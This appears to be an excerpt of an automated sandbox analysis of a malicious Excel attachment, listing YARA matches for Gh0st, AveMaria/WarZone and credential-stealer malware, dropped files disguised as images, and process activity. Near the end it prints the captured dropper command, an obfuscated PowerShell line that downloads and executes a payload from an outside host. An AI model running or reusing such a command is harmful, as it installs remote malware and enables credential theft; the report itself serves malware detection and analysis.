        Source: 00000016.00000002.944604602.0000000005292000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 00000012.00000003.779302580.00000000006C8000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 00000013.00000003.785520059.000000000062B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 00000013.00000002.946480583.0000000003465000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 00000003.00000003.759722473.00000000061E3000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
        Source: 00000013.00000000.780781628.0000000000443000.00000002.00020000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 00000013.00000003.785553106.000000000062C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 00000012.00000003.781273040.00000000006C6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 00000003.00000003.739726186.000000000071D000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
        Source: 00000013.00000002.946136847.0000000002B8F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 00000012.00000000.764732381.0000000000443000.00000002.00020000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 00000013.00000002.939727802.000000000054F000.00000040.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 00000013.00000003.785647201.000000000062C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 00000013.00000001.781400247.000000000054F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000013.00000001.781273752.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000013.00000002.939472829.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 00000012.00000002.783515823.0000000002C2F000.00000040.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000012.00000002.783479226.0000000002AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 00000012.00000003.780359821.00000000006E6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 00000012.00000002.782434479.0000000000443000.00000002.00020000.sdmp, type: MEMORYMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: C:\Users\user\Desktop\DCC40000, type: DROPPEDMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
        Source: C:\Users\user\AppData\Local\Temp\Test1.txt, type: DROPPEDMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: C:\Users\user\AppData\Local\Temp\Test1.txt, type: DROPPEDMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg, type: DROPPEDMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpg, type: DROPPEDMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 18.0.Test3.jpg.400000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 18.0.Test3.jpg.400000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 18.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 18.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 19.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 19.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 19.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 19.2.Test3.jpg.400000.0.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 19.2.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 19.2.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 18.2.Test3.jpg.2ae0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 18.2.Test3.jpg.2ae0000.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 18.2.Test3.jpg.2ae0000.1.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 18.2.Test3.jpg.2ae0000.1.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 18.2.Test3.jpg.2ae0000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 18.2.Test3.jpg.2ae0000.1.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 19.0.Test3.jpg.400000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 19.0.Test3.jpg.400000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 19.1.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 19.1.Test3.jpg.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 19.1.Test3.jpg.400000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 19.1.Test3.jpg.400000.0.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
        Source: 19.1.Test3.jpg.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 19.1.Test3.jpg.400000.0.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: Test3.jpg.15.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winXLS@25/31@1/2
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgFile created: C:\Program Files\Microsoft DN1Jump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5468:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5460:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5900:120:WilError_01
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{BC933150-BEEB-49D8-8D1E-23D6DFF39532} - OProcSessId.datJump to behavior
        Source: Telex06012020.xlsOLE indicator, Workbook stream: true
        Source: C:\Users\user\AppData\Local\Temp\Test3.jpgSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: Test3.jpg, 00000013.00000003.926400265.00000000009E0000.00000040.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
        Source: Test3.jpg, 00000013.00000003.926400265.00000000009E0000.00000040.00000001.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
        Source: Test3.jpg, 00000013.00000003.926400265.00000000009E0000.00000040.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
        Source: Test3.jpg, 00000013.00000003.926400265.00000000009E0000.00000040.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
        Source: Test3.jpg, 00000013.00000003.926400265.00000000009E0000.00000040.00000001.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
        Source: Test3.jpg, 00000013.00000003.926400265.00000000009E0000.00000040.00000001.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
        Source: Test3.jpg, 00000013.00000003.926400265.00000000009E0000.00000040.00000001.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
        Source: Telex06012020.xlsVirustotal: Detection: 12%
        Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe CmD.Exe /C poWeRSheLL.EXe -ex BYPAsS -NoP -w 1 iEx( curL ('http://lankarecipes.com/mages.jp' + 'g' ))
        Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
